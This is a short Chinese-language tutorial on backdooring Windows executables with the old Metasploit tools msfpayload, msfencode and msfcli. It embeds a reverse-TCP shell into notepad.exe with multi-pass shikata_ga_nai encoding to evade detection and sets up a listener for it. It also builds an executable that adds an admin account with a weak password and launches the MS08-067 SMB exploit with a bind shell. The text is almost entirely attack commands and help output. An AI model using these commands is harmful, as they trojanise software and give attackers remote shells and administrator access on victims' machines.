用Metasploit Framework给EXE文件加后门
官方网站 www.metasploit.com
大多来自 https://www.linux520.com/ 感谢beach老师的无私奉献
https://www.linux520.com/v/l00047/l00047.html
https://www.irongeek.com/videos/msfpayload-msfencoder-metasploit-3-3.swf 这个两个视频都是比较有用的.
===================
msfpayload msfencode msfcli
===================
msfpayload -h
Usage: /msf3/msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[V]BA|[W]ar>
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=4455 R | msfencode -k -x notepad.exe -t exe -e x86/shikata_ga_nai -c 5 -o diy_notepad.exe
msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=192.168.1.13 lport=4455 E
=====================
msfpayload windows/adduser pass=123123 user=admin x >diy_user_add.exe 生成可执行文件
chmod +x diy_user_add.exe 添加此文件的执行权限(默认生成是没有执行权限的)
===============
$ msfcli -h
Usage: /msf3/msfcli <exploit_name> <option=value> [mode]
/msf3/msfcli <exploit_name> <payload_name> t(target) o(option)
========================================================
Mode Description
---- -----------
(H)elp You're looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
msfcli windows/smb/ms08_067_netapi payload=windows/shell/bind_tcp target=1 RHOST=192.168.1.13 LPORT=5555